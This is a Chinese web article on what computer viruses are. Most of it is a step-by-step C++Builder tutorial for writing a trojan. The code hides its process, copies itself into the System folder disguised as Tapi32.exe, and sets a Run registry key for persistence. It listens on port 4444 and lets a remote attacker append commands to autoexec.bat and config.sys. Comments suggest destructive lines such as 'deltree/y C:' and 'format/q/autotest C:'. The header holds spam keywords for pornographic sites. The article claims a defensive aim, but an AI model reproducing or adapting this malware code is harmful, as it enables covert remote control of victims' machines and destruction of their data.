不卡AV在线|网页在线观看无码高清|亚洲国产亚洲国产|国产伦精品一区二区三区免费视频

學(xué)習(xí)啦 > 學(xué)習(xí)電腦 > 電腦安全 > 病毒知識(shí) > 計(jì)算機(jī)病毒實(shí)質(zhì)是什么呢

計(jì)算機(jī)病毒實(shí)質(zhì)是什么呢

時(shí)間: 林輝766 分享

計(jì)算機(jī)病毒實(shí)質(zhì)是什么呢

  計(jì)算機(jī)病毒的實(shí)質(zhì)是什么,你有去了解過(guò)嗎?下面由學(xué)習(xí)啦小編給你做出詳細(xì)的計(jì)算機(jī)病毒實(shí)質(zhì)說(shuō)明介紹!希望對(duì)你有幫助!

  計(jì)算機(jī)病毒實(shí)質(zhì)說(shuō)明一:

  計(jì)算機(jī)病毒(ComputerVirus)實(shí)質(zhì):是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者毀壞數(shù)據(jù),影響計(jì)算機(jī)使用,并能自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼。計(jì)算機(jī)病毒是指能夠影響破壞計(jì)算機(jī)正常工作的、人為編制的、可自我復(fù)制的一組計(jì)算機(jī)指令或程序。

  (注:《中華人民共和國(guó)計(jì)算機(jī)信息系統(tǒng)安全保護(hù)條例》)

  計(jì)算機(jī)病毒利用系統(tǒng)硬件或軟件的缺陷進(jìn)入計(jì)算機(jī)中,通過(guò)不斷地自身復(fù)制,占據(jù)存儲(chǔ)空間,影響或降低計(jì)算機(jī)性能、破壞或使其癱瘓。此外,計(jì)算機(jī)病毒還可以將自身附著在不同類型的文件上,使其作為病毒的載體,通過(guò)染毒文件的傳播與傳送,達(dá)到破壞計(jì)算機(jī)文件和系統(tǒng)的目的,給計(jì)算機(jī)用戶帶來(lái)麻煩,造成其信息財(cái)產(chǎn)的巨大損失。

  計(jì)算機(jī)病毒實(shí)質(zhì)說(shuō)明二:

  木馬一定是由兩部分組成——服務(wù)器程序(Server)和客戶端程序(Client),服務(wù)器負(fù)責(zé)打開攻擊的道路,就像一個(gè)內(nèi)奸特務(wù);客戶端負(fù)責(zé)攻擊目標(biāo),兩者需要一定的網(wǎng)絡(luò)協(xié)議來(lái)進(jìn)行通訊(一般是TCP/IP協(xié)議)。為了讓大家更好的了解木馬攻擊技術(shù),破除木馬的神秘感,我就來(lái)粗略講一講編寫木馬的技術(shù)并順便編寫一個(gè)例子木馬,使大家能更好地防范和查殺各種已知和未知的木馬。

  首先是編程工具的選擇。目前流行的開發(fā)工具有C++Builder、VC、VB和Delphi,這里我們選用C++Builder(以下簡(jiǎn)稱BCB);VC雖然好,但GUI設(shè)計(jì)太復(fù)雜,為了更好地突出我的例子,集中注意力在木馬的基本原理上,我們選用可視化的BCB;Delphi也不錯(cuò),但缺陷是不能繼承已有的資源(如“死牛崇拜”黑客小組公布的BO2000源代碼,是VC編寫的,網(wǎng)上俯拾皆是);VB嘛,談都不談——難道你還給受害者傳一個(gè)1兆多的動(dòng)態(tài)鏈接庫(kù)——Msvbvm60.dll嗎?

  啟動(dòng)C++Builder 5.0企業(yè)版,新建一個(gè)工程,添加三個(gè)VCL控件:一個(gè)是Internet頁(yè)中的Server Socket,另兩個(gè)是Fastnet頁(yè)中的NMFTP和NMSMTP。Server Socket的功能是用來(lái)使本程序變成一個(gè)服務(wù)器程序,可以對(duì)外服務(wù)(對(duì)攻擊者敞開大門)。Socket最初是在Unix上出現(xiàn)的,后來(lái)微軟將它引入了Windows中(包括Win98和WinNt);后兩個(gè)控件的作用是用來(lái)使程序具有FTP(File Transfer Protocol文件傳輸協(xié)議)和SMTP(Simple Mail Transfer Protocol簡(jiǎn)單郵件傳輸協(xié)議)功能,大家一看都知道是使軟件具有上傳下載功能和發(fā)郵件功能的控件。

  Form窗體是可視的,這當(dāng)然是不可思議的。不光占去了大量的空間(光一個(gè)Form就有300K之大),而且使軟件可見,根本沒(méi)什么作用。因此實(shí)際寫木馬時(shí)可以用一些技巧使程序不包含F(xiàn)orm,就像Delphi用過(guò)程實(shí)現(xiàn)的小程序一般只有17K左右那樣。

  我們首先應(yīng)該讓我們的程序能夠隱身。雙擊Form,首先在FormCreate事件中添加可使木馬在Win9x的“關(guān)閉程序”對(duì)話框中隱藏的代碼。這看起來(lái)很神秘,其實(shí)說(shuō)穿了不過(guò)是一種被稱之為Service的后臺(tái)進(jìn)程,它可以運(yùn)行在較高的優(yōu)先級(jí)下,可以說(shuō)是非??拷到y(tǒng)核心的設(shè)備驅(qū)動(dòng)程序中的那一種。因此,只要將我們的程序在進(jìn)程數(shù)據(jù)庫(kù)中用RegisterServiceProcess()函數(shù)注冊(cè)成服務(wù)進(jìn)程(Service Process)就可以了。不過(guò)該函數(shù)的聲明在Borland預(yù)先打包的頭文件中沒(méi)有,那么我們只好自己來(lái)聲明這個(gè)位于KERNEL32.DLL中的鳥函數(shù)了。

  首先判斷目標(biāo)機(jī)的操作系統(tǒng)是Win9x還是WinNt:

  {

  DWORD dwVersion = GetVersion();

  // 得到操作系統(tǒng)的版本號(hào)

  if (dwVersion >= 0x80000000)

  // 操作系統(tǒng)是Win9x,不是WinNt

  {

  typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

  file://定/義RegisterServiceProcess()函數(shù)的原型

  HINSTANCE hDLL;

  LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

  hDLL = LoadLibrary("KERNEL32");

  file://加/載RegisterServiceProcess()函數(shù)所在的動(dòng)態(tài)鏈接庫(kù)KERNEL32.DLL

  lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

  file://得/到RegisterServiceProcess()函數(shù)的地址

  lpRegisterServiceProcess(GetCurrentProcessId(),1);

  file://執(zhí)/行RegisterServiceProcess()函數(shù),隱藏本進(jìn)程

  FreeLibrary(hDLL);

  file://卸/載動(dòng)態(tài)鏈接庫(kù)

  }

  }

  這樣就終于可以隱身了(害我敲了這么多代碼!)。為什么要判斷操作系統(tǒng)呢?因?yàn)閃inNt中的進(jìn)程管理器可以對(duì)當(dāng)前進(jìn)程一覽無(wú)余,因此沒(méi)必要在WinNt下也使用以上代碼(不過(guò)你可以使用其他的方法,這個(gè)留到后面再講)。接著再將自己拷貝一份到%System%目錄下,例如:

  C:\Windows\System,并修改注冊(cè)表,以便啟動(dòng)時(shí)自動(dòng)加載:

  {

  char TempPath[MAX_PATH];

  file://定/義一個(gè)變量

  GetSystemDirectory(TempPath ,MAX_PATH);

  file://TempPath/是system目錄緩沖區(qū)的地址,MAX_PATH是緩沖區(qū)的大小,得到目標(biāo)機(jī)的System目錄路徑

  SystemPath=AnsiString(TempPath);

  file://格/式化TempPath字符串,使之成為能供編譯器使用的樣式

  CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\Tapi32.exe").c_str() ,FALSE);

  file://將/自己拷貝到%System%目錄下,并改名為Tapi32.exe,偽裝起來(lái)

  Registry=new TRegistry;

  file://定/義一個(gè)TRegistry對(duì)象,準(zhǔn)備修改注冊(cè)表,這一步必不可少

  Registry->RootKey=HKEY_LOCAL_MACHINE;

  file://設(shè)/置主鍵為HKEY_LOCAL_MACHINE

  Registry->OpenKey("Software\Microsoft\Windows\CurrentVersion\Run",TRUE);

  file://打/開鍵值Software\Microsoft\Windows\CurrentVersion\Run,如果不存在,就創(chuàng)建之

  try

  {

  file://如/果以下語(yǔ)句發(fā)生異常,跳至catch,以避免程序崩潰

  if(Registry->ReadString("crossbow")!=SystemPath+"\Tapi32.exe")

  Registry->WriteString("crossbow",SystemPath+"\Tapi32.exe");

  file://查/找是否有“crossbow”字樣的鍵值,并且是否為拷貝的目錄%System%+Tapi32.exe

  file://如/果不是,就寫入以上鍵值和內(nèi)容

  }

  catch(...)

  {

  file://如/果有錯(cuò)誤,什么也不做

  }

  }

  好,F(xiàn)ormCreate過(guò)程完成了,這樣每次啟動(dòng)都可以自動(dòng)加載Tapi32.exe,并且在“關(guān)閉程序”對(duì)話框中看不見本進(jìn)程了,木馬的雛形初現(xiàn)。

  接著選中ServerSocket控件,在左邊的Object Inspector中將Active改為true,這樣程序一啟動(dòng)就打開特定端口,處于服務(wù)器工作狀態(tài)。再將Port填入4444,這是木馬的端口號(hào),當(dāng)然你也可以用別的。但是你要注意不要用1024以下的低端端口,因?yàn)檫@樣不但可能會(huì)與基本網(wǎng)絡(luò)協(xié)議使用的端口相沖突,而且很容易被發(fā)覺(jué),因此盡量使用1024以上的高端端口(不過(guò)也有這樣一種技術(shù),它故意使用特定端口,因?yàn)槿绻饹_突,Windows也不會(huì)報(bào)錯(cuò) ^_^)。你可以看一看TNMFTP控件使用的端口,是21號(hào)端口,這是FTP協(xié)議的專用控制端口(FTP Control Port);同理TNMSMTP的25號(hào)端口也是SMTP協(xié)議的專用端口。

  再選中ServerSocket控件,點(diǎn)擊Events頁(yè),雙擊OnClientRead事件,敲入以下代碼:

  {

  FILE *fp=NULL;

  char * content;

  int times_of_try;

  char TempFile[MAX_PATH];

  file://定/義了一堆待會(huì)兒要用到的變量

  sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\Win369.BAT")).c_str());

  file://在%System%下/建立一個(gè)文本文件Win369.bat,作為臨時(shí)文件使用

  AnsiString temp=Socket->ReceiveText();

  file://接/收客戶端(攻擊者,也就是你自己)傳來(lái)的數(shù)據(jù)

  }

  好,大門敞開了!接著就是修改目標(biāo)機(jī)的各種配置了!^_^ 首先我們來(lái)修改Autoexec.bat和Config.sys吧:

  {

  if(temp.SubString(0,9)=="edit conf")

  file://如/果接受到的字符串的前9個(gè)字符是“edit conf”

  {

  int number=temp.Length();

  file://得/到字符串的長(zhǎng)度

  int file_name=atoi((temp.SubString(11,1)).c_str());

  file://將/第11個(gè)字符轉(zhuǎn)換成integer型,存入file_name變量

  file://為/什么要取第11個(gè)字符,因?yàn)榈?0個(gè)字符是空格字符

  content=(temp.SubString(12,number-11)+'\n').c_str();

  file://余/下的字符串將被作為寫入的內(nèi)容寫入目標(biāo)文件

  FILE *fp=NULL;

  char filename[20];

  chmod("c:\autoexec.bat",S_IREAD|S_IWRITE);

  chmod("c:\config.sys",S_IREAD|S_IWRITE);

  file://將/兩個(gè)目標(biāo)文件的屬性改為可讀可寫

  if(file_name==1)

  sprintf(filename,"%s","c:\autoexec.bat");

  file://如/果第11個(gè)字符是1,就把Autoexec.bat格式化

  else if(file_name==2)

  sprintf(filename,"%s","c:\config.sys");

  file://如/果第11個(gè)字符是1,就把Config.sys格式化

  times_of_try=0;

  file://定/義計(jì)數(shù)器

  while(fp==NULL)

  {

  file://如/果指針是空

  fp=fopen(filename,"a+");

  file://如/果文件不存在,創(chuàng)建之;如果存在,準(zhǔn)備在其后添加

  file://如/果出錯(cuò),文件指針為空,這樣就會(huì)重復(fù)

  times_of_try=times_of_try+1;

  file://計(jì)/數(shù)器加1

  if(times_of_try>100)

  {

  file://如/果已經(jīng)試了100次了,仍未成功

  Socket->SendText("Fail By Open File");

  file://就/發(fā)回“Fail By Open File”的錯(cuò)誤信息

  goto END;

  file://跳/至END處

  }

  }

  fwrite(content,sizeof(char),strlen(content),fp);

  file://寫/入添加的語(yǔ)句,例如deltree/y C:或者format/q/autotest C:,夠毒吧?!

  fclose(fp);

  file://寫/完后關(guān)閉目標(biāo)文件

  Socket->SendText("Sucess");

  file://然/后發(fā)回“Success”的成功信息

  }

  }

  你現(xiàn)在可以通過(guò)網(wǎng)絡(luò)來(lái)察看目標(biāo)機(jī)上的這兩個(gè)文件了,并且還可以向里面隨意添加任何命令。

  看了“計(jì)算機(jī)病毒實(shí)質(zhì)是什么呢 ”文章的還看了:

1.計(jì)算機(jī)病毒實(shí)質(zhì)是什么

2.計(jì)算機(jī)病毒本質(zhì)是什么

3.計(jì)算機(jī)病毒的本質(zhì)是什么

4.計(jì)算機(jī)病毒是什么

5.計(jì)算機(jī)病毒定義是什么

6.計(jì)算機(jī)病毒產(chǎn)生原因是什么

839519